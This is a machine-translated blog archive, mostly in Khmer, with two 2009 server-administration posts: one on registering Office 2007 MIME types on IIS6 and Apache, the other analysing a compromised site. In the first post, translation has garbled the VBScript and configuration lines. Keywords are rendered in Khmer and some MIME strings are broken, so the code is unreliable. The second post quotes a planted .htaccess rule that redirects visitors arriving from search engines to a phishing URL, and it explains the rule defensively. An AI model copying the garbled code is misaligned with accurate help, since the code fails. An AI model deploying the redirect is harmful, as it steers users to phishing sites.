ស្លាក​ប័ណ្ណសារ​សម្រាប់ » htaccess មាន «

ថ្ងៃសៅរ៍, ទី 21 ខែកុម្ភៈ, 2009 | អ្នក​និពន្ធ:

ប្រភេទឯកសារថ្មី ការិយាល័យ 2007 បានផ្ដល់ឱ្យម៉ាស៊ីនបណ្ដាញមួយចំនួនមានបញ្ហានៅពេលដែលអតិថិជនរបស់ខ្លួនចង់ផ្តល់ឯកសារសម្រាប់ទាញយក. ជា​ញឹកញាប់​បំផុត, ឯកសារដែលត្រូវបានផ្តល់ជូនដោយម៉ាស៊ីនបម្រើបណ្តាញដែលជា “text / html” ដែលបន្ទាប់មកត្រូវបានបង្ហាញជាមួយតោននៃសំរាមនៅលើអេក្រង់របស់អ្នកប្រើបណ្តាញ.

វិធីល្អបំផុតដើម្បីដោះស្រាយនេះគឺដើម្បីបន្ថែមទាំងអស់ MIME & ‧; ប្រភេទការកំណត់រចនាសម្ព័ន្ធចម្បងរបស់ម៉ាស៊ីនបម្រើ. IIS7 សម្រាប់ Windows មានប្រភេទ MIME បានត្រឹមត្រូវដែលបង្កើតឡើងទាំងនេះដោយលំនាំដើមរួចទៅហើយ. IIS6 និង IIS5 តម្រូវឱ្យប្រភេទ MIME ដែលនឹងត្រូវបានបន្ថែម, ដែលជាកម្លាំង កម្មវិធី Apache នៅលើការដំឡើងដែលមានវ័យចំណាស់. សម្រាប់កម្មវិធី Apache, នៅទីនោះគឺជាការឆ្ពោះសម្រាប់ម្ចាស់ដែនបុគ្គលដើម្បីបន្ថែមប្រភេទ mime តាមរយៈកម្មវិធី Apache ផងដែរ .htaccess មាន ឯកសារ.

IIS 6 ប្រភេទការបន្ថែម MIME & ‧; (សម្រាប់អ្នកគ្រប់គ្រងម៉ាស៊ីនបម្រើ)

មុនពេលនេះអាចត្រូវបានធ្វើ, ធានាថាម៉ាស៊ីនបម្រើរបស់អ្នកត្រូវបានកំណត់ផងដែរដើម្បីអនុញ្ញាតឱ្យកែសម្រួល metabase ដោយផ្ទាល់:

  1. ផ្ទុក កម្មវិធីគ្រប់គ្រង IIS: ចាប់ផ្តើម -> Rមួយ, “inetmgr” -> [យល់ព្រម]
  2. ចុចខាងស្ដាំ “ម៉ាស៊ីនបម្រើ” ហើយចុច “P បានroperties”
  3. នៅក្នុងរយៈពេល “សេវាផ្ទុកឈ្មោះអ៊ីនធឺណិត” ផ្ទាំង (ជាធម្មតាផ្ទាំងតែប៉ុណ្ណោះ), ធានាថា “អ៊ីnកែសម្រួលដោយផ្ទាល់ Metabase អាច” ប្រអប់ធីកត្រូវបានធីក.
  4. សូមចុច [យល់ព្រម]

ត្រូវ​ប្រាកដ​ថា ការកំណត់រចនាសម្ព័ន្ធ IIS ឡើងវិញរបស់ (នៅ​ទីនេះ សម្រាប់ IIS5) មុន. ខ្ញុំនឹងមិនទទួលខុសត្រូវចំពោះការគ្រប់គ្រងណាមួយបំបែកម៉ាស៊ីនបម្រើរបស់គាត់. ខ្ញុំមានមូលហេតុដើម្បីជឿថានេះ អាច ធ្វើការផងដែរនៅលើ IIS5 ទោះជាយ៉ាងណាខ្ញុំមានមូលហេតុគ្រាន់តែជាការជាច្រើនដូចជាការជឿថាវាអាចគ្រាន់តែជាការផ្តល់នូវការជាច្រើននៃកំហុស. ប្រសិនបើមាន IIS5 មួយ / ប្រព័ន្ធប្រតិបត្តិការ Windows 2000 គ្រប់គ្រងមានឆន្ទៈក្នុងការសាកល្បងនេះសម្រាប់ខ្ញុំ បន្ទាប់ពីការបម្រុងទុក ការកំណត់រចនាសម្ព័ន្ធរបស់អ្នកសូមអនុញ្ញាតឱ្យខ្ញុំដឹងលទ្ធផល.

ចម្លងអត្ថបទដូចខាងក្រោមនេះចូលក្នុងឯកសារឈ្មោះ msoff07 addmime.vbs និងប្រតិបត្តិវា ម្តង ពីបន្ទាត់ពាក្យបញ្ជាដោយវាយ cscript msoff07 addmime.vbs- ហើយចុចបញ្ចូល. ប្រសិនបើអ្នករត់វាច្រើនជាងម្ដង, ប្រភេទ MIME & ‧នឹងត្រូវបានបន្ថែមរាល់ពេលហើយអ្នកនឹងមានធាតុដូចគ្នាច្រើន:

'ស្គ្រីបនេះបន្ថែមការិយាល័យចាំបាច់ 2007 ប្រភេទ MIME ដើម្បី IIS មួយ 6 ម៉ាស៊ីន​បម្រើ.
'ដើម្បីប្រើស្គ្រីបនេះ, គ្រាន់តែចុចទ្វេដងឬប្រតិបត្តិវាពីបន្ទាត់ពាក្យបញ្ជា.
"ការរត់ស្គ្រីបលទ្ធផលដងច្រើននៅក្នុងធាតុច្រើនក្នុងការ
"IIS MimeMap ដូច្នេះអ្នកមិនគួររត់វាច្រើនជាងម្ដង.
"បានកែប្រែពី http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
ស្រអាប់ MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
const ADS_PROPERTY_UPDATE = 2 
 
"កំណត់ប្រភេទ MIME & ‧នឹងត្រូវបានបន្ថែម
MimeTypesToAddArray = អារេ(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
"ទទួលបានវត្ថុ mimemap នេះ
កំណត់ MimeMapObj = GetObject("IIS://localhost / MimeMap")
 
"ចូរហៅ AddMimeType សម្រាប់គ្រប់គូនៃផ្នែកបន្ថែមប្រភេទ MIME /
សម្រាប់ ការប្រឆាំង = 0 ទៅ UBound(MimeTypesToAddArray) ជំហានទី 2
    AddMimeType MimeTypesToAddArray(ការប្រឆាំង), MimeTypesToAddArray(ការប្រឆាំង+1)
បន្ទាប់
 
'បង្កើតវត្ថុសែល
កំណត់ WshShell = CreateObject("WScript.Shell")
 
"បញ្ឈប់និងចាប់ផ្តើមសេវា IIS នេះ
កំណត់ oExec = WshShell.exec("net stop w3svc")
តើ ខណៈពេល oExec.ស្ថានភាព = 0
    WScript.ការគេង 100
រង្វិលជុំ
 
កំណត់ oExec = WshShell.exec("net start w3svc")
តើ ខណៈពេល oExec.ស្ថានភាព = 0
    WScript.ការគេង 100
រង្វិលជុំ
 
កំណត់ oExec = គ្មានអ្វី
 
'ស្ថានភាពទៅអ្នកប្រើរាយការណ៍
WScript.អេកូ "Microsoft Office 2007 ប្រភេទឯកសារ MIME ដែលត្រូវបានចុះបញ្ជី។"
 
"អនុ AddMimeType
អនុ AddMimeType (ext, MTYPE)
 
    "ទទួលបានការផ្គូផ្គងពីអចលនទ្រព្យ MimeMap នេះ.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
 
    "បន្ថែមផែនទីថ្មី.
    ខ្ញុំ = UBound(MimeMapArray) + 1
    ReDim រក្សា MimeMapArray(ខ្ញុំ)
    កំណត់ MimeMapArray(ខ្ញុំ) = CreateObject("MimeMap")
    MimeMapArray(ខ្ញុំ).ផ្នែកបន្ថែម = ext
    MimeMapArray(ខ្ញុំ).ប្រភេទ Mime = MTYPE
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo
 
បញ្ចប់ អនុ

Apache MIME type addition (សម្រាប់អ្នកគ្រប់គ្រងម៉ាស៊ីនបម្រើ)

Apache stores its MIME types in a file normally located at $installpath/conf/mime.types. See the mod_mime ឯកសារ for more on how it works. សំខាន់​បំផុត​លីនុច installs its MIME types at /etc/httpd/conf/mime.types និង Parallels Plesk installs it in /usr / local / PSA / គ្រប់គ្រង / conf / mime.types. ការចែកចាយរបស់អ្នកអាចមានវានៅក្នុងកន្លែងមួយផ្សេងទៀត, ដូច្នេះការរកឃើញរបស់អ្នក mime.types ឯកសារដោយរត់ កំណត់ទីតាំង mime.types.

បន្ថែមបន្ទាត់ខាងក្រោមទៅក្នុងឯកសារ mime.types របស់អ្នក:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME type addition (For the domain owner with at least FTP accessusing .htaccess file)

Add the following text to your domain’s .htaccess មាន ឯកសារ, most commonly in an httpdocs/ directory

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application/vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application/vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType កម្មវិធី / vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType កម្មវិធី / vnd.ms-excel.addin.macroEnabled.12 xlam
AddType កម្មវិធី / vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType កម្មវិធី / vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType កម្មវិធី / vnd.openxmlformats-officedocument.spreadsheetml.sheet XLSX
AddType កម្មវិធី / vnd.ms-excel.template.macroEnabled.12 xltm
AddType កម្មវិធី / vnd.openxmlformats-officedocument.spreadsheetml.template xltx
ចែករំលែក
ថ្ងៃ​ព្រ​ហ​ស្​​ប, January 22nd, 2009 | អ្នក​និពន្ធ:

I very recently found a problem with a client’s web site due to a .htaccess មាន ឯកសារ. The site was hosted on a ប្រព័ន្ធប្រតិបត្តិការ Windows server running IIS using IISPassword, which makes use of .htaccess មាន files for its settings.

IISPassword doesn’t follow exactly the same rules as with កម្មវិធី Apache ទោះ​ជា​យ៉ាង​ណា. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,ឬ]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,ឬ]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,ឬ]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,ឬ]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,ឬ]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,ឬ]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

ជា​ការ​ពិត​ណាស់, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

ចែករំលែក